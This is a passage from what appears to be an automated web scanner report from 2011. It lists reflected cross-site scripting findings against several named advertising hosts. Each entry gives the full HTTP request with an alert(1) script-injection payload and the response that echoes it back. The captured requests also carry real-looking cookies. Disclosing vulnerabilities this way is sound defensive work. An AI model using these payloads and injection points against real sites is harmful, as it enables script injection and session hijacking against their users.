GET /trackports/rep/base/track.php?callback=jsonp1297647336859&type=initbdd5a<script>alert(1)</script>01f935525e0&section_id=124015&content_type=PAGE&page_url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&failed=0&reason=&version=31 HTTP/1.1
Host: dev.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Content-type: text/html
Date: Mon, 14 Feb 2011 01:40:08 GMT
Server: lighttpd/1.4.19
Content-Length: 75

Error: type "initbdd5a<script>alert(1)</script>01f935525e0" not recognized.

1.162. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a742"><script>alert(1)</script>37cfb750f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM6a742"><script>alert(1)</script>37cfb750f3/2010DM/11355486136@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM6a742"><script>alert(1)</script>37cfb750f3/2010DM/1783083111/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.163. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd26f"><script>alert(1)</script>86e816e9a4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMfd26f"><script>alert(1)</script>86e816e9a4d/11355486136@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMfd26f"><script>alert(1)</script>86e816e9a4d/114049446/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.164. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e1a"><script>alert(1)</script>f19825639fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11355486136@x2349e1a"><script>alert(1)</script>f19825639fa?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1477922344/x2349e1a"><script>alert(1)</script>f19825639fa/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.165. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a745b"><script>alert(1)</script>050408e5f6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa745b"><script>alert(1)</script>050408e5f6b/2010DM/11473307965@x23?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMa745b"><script>alert(1)</script>050408e5f6b/2010DM/1959021525/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.166. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e244"><script>alert(1)</script>5324050ac37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM1e244"><script>alert(1)</script>5324050ac37/11473307965@x23?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM1e244"><script>alert(1)</script>5324050ac37/1110964581/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.167. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1f2c"><script>alert(1)</script>d093f0af15f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11473307965@x23f1f2c"><script>alert(1)</script>d093f0af15f?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1112750384/x23f1f2c"><script>alert(1)</script>d093f0af15f/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.168. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 571f4"><script>alert(1)</script>cd3219b027d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM571f4"><script>alert(1)</script>cd3219b027d/2010DM/11781759243@x23?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM571f4"><script>alert(1)</script>cd3219b027d/2010DM/117581210/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.169. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc4e6"><script>alert(1)</script>518d6ce49b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMbc4e6"><script>alert(1)</script>518d6ce49b7/11781759243@x23?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMbc4e6"><script>alert(1)</script>518d6ce49b7/1996747534/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.170. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d6c"><script>alert(1)</script>77e70440218 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11781759243@x2336d6c"><script>alert(1)</script>77e70440218?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/464947510/x2336d6c"><script>alert(1)</script>77e70440218/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.171. http://ebay.adnxs.com/ttj [pt1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 320bc'-alert(1)-'47232191921 was submitted in the pt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384320bc'-alert(1)-'47232191921&pt2=0000951470&pt3=1183&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwt43i6gQQt43i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:34:47 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647287&Perf_Tracker_1=0000777384320bc'-alert(1)-'47232191921&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&imp_id=8886539978897813417&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEA
...[SNIP]...

1.172. http://ebay.adnxs.com/ttj [pt2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15a6a'-alert(1)-'5f2f4eb2edd was submitted in the pt2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384&pt2=000095147015a6a'-alert(1)-'5f2f4eb2edd&pt3=1183&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
